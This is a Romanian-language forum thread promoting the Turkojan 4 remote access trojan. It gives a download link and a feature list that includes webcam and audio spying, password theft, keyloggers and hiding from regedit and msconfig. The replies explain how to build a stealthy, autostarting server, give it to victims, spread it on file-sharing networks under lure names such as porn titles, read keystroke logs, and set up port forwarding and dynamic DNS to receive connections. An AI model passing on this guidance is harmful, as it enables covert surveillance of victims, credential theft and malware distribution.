Jump to content
yakuZza22

Turkojan 4 !!!!!!

Recommended Posts

Turkojan 4 !!!!

Sincer e tare....incercati

ss1.JPG

Reverse Connection

Remote Desktop(very fast)

Webcam Streaming(very fast)

Audio Streaming

Thumbnail viewer

Remote passwords

MSN Sniffer

Remote Shell

Web-Site Blocking

Chat with server

Send fake messages

Advanced file manager

Zipping files&folders

Find files

Change remote screen resolution

Mouse manager

Information about remote computer

Clipboard manager

IE options

Running Process

Service Manager

Keyboard Manager

Online keylogger

Offline keylogger

Fun Menu

Registry manager

Invisible in Searching Files/Regedit/Msconfig

Small Server (100kb)

Download:

http://www.turkojan.com/sayac/click.php?id=10

Link to comment
Share on other sites

ca sa faceti serverul, dati la "editor". la address bagati ip-ul vostru, portul ramane asa, delay la fel, iar la username scrieti ce vreti. setati "stealth mode" si bifati tot de la "other settings". mai bifati si "autostart server" si dati save. o sa va intrebe unde vreti sa-l salvati si cu ce nume. fisierul executabil creat il dati cuiva. cand il executa, o sa se conecteze el la voi (la turkojan). mi se pare super tare. are optiuni de aflat parolele la instant messengere, ftp-uri, parolele salvate in browsere, daca are webcam poti sa vezi si sa si inregistrezi. ce mi se pare frumos e ca are si keylogger. dupa ce ai intrat la el, poti sa dai la manage keyboard->offline keyboard->get logs si va arata tot ce a scris el de cand a executat serverul :) super tare. daca citeati help-ul din hompage, intelegeati cum se foloseste :D

cheers

Link to comment
Share on other sites

un tutorial ar fi ideal daca ai timp si chef, pt cei care vor sa invete

timp si chef am, si as face tutorial video, dar nu prea ma pricep :) inregistrez cu hypercam, dar nu am unde sa postez filmuletul. unul de 1 minut, imi ocupa vreo 3 mega :D

de scris...nu stiu ce as putea sa scriu ca sa completez ce am spus mai sus. daca mai e ceva ce nu stii, intreaba :P

ah, si de raspindit il raspandesti foarte usor pe dc, punandu-i si niste nume atragatoare gen "xxx pamela andreson" and shit like that :) am ip-uri si din strainatate...foarte tare

cheers

Link to comment
Share on other sites

nu reusesc sa l fac.. nu mi merge... ia zi mi cand dai la local tools ...la port tester si dai test ... ce ti zice ?? mie mi da port has a problem ... de la aia sa fie ??

a mai reusit cineva sa faca ceva cu prg asta ? ... eu am conexiune prin pppoe... deci am un ip alocat de server ... nu am ip real ... a reusit cineva sa l foloseasca pe pppoe??/

Link to comment
Share on other sites

nu reusesc sa l fac.. nu mi merge... ia zi mi cand dai la local tools ...la port tester si dai test ... ce ti zice ?? mie mi da port has a problem ... de la aia sa fie ??

a mai reusit cineva sa faca ceva cu prg asta ? ... eu am conexiune prin pppoe... deci am un ip alocat de server ... nu am ip real ... a reusit cineva sa l foloseasca pe pppoe??/

da ma omule,nu am zis mai sus ca merge ?!

romtel3c0mu masii...

Link to comment
Share on other sites

nu iti merge pt ca nu ai porturile deschise,intra pe speedtouch.lan-->toolbox-->game & application sharing-->assign a game or application to a local device-->create a new game or application-->scrii numele si bifezi manual entry of port maps-->scrii la port range de la cat la cat sa iti deschida(in functie de setarile trojanului) si dai add.de exemplu 65000-65010,o sa ai porturile 65001,65002...65010 deschise.

ps:iti recomand sa iti faci un cont pe dyndns.org.deduci tu de ce am zis asta...

bafta

Link to comment
Share on other sites

am vazut ca mi ai zis...dar eu nu am reusit sa l fac sa mearga ... treaba e ca vreau sa puna cineva aici cum a facut concret .. si sa mi zica de porturile alea daca stie ... de ce nu mi merg ... ms

deschizi porturile din interfata modem-ului. cont pe dyndns.org trebuie sa-ti faci pentru ca ai ip dinamic si o sa-ti mearga decat prima data. dupa ce ti se aloca alt ip, nu mai merge :) faci ceva de genul nike.mine.nu sau cum vrei tu si il bagi la address (acolo cand dai "editor" ca sa faci server-ul)

cheers

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.



×
×
  • Create New...